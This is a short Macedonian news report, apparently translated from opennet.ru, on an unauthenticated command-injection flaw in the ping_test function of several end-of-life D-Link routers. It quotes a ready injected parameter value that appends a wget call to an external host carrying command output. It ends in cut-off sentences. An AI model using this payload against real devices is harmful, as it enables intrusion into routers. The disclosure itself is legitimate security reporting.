Во безжичните рутери D-Link
Интересно, според програмерите на фирмверот, повикот „ping_test“ треба да се изврши само по автентикација, но во реалноста се повикува во секој случај, без оглед на најавувањето на веб-интерфејсот. Конкретно, кога се пристапува до скриптата apply_sec.cgi и поминување на параметарот „action=ping_test“, скриптата се пренасочува на страницата за автентикација, но во исто време го извршува дејството поврзано со ping_test. За извршување на кодот, беше искористена друга ранливост во самиот ping_test, кој ја повикува алатката за пинг без правилно да ја провери исправноста на IP адресата испратена на тестирање. На пример, за да ја повикате алатката wget и да ги пренесете резултатите од командата „echo 1234“ на надворешен домаќин, само наведете го параметарот „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( ехо 1234)“.
Присуството на ранливоста е официјално потврдено во следните модели:
- DIR-655 со фирмвер 3.02b05 или постар;
- DIR-866L со фирмвер 1.03b04 или постар;
- DIR-1565 со фирмвер 1.01 или постар;
- DIR-652 (не се обезбедени податоци за проблематичните верзии на фирмверот)
Периодот за поддршка на овие модели веќе е истечен, па затоа D-Link
Подоцна беше откриено дека и ранливоста била
Извор: opennet.ru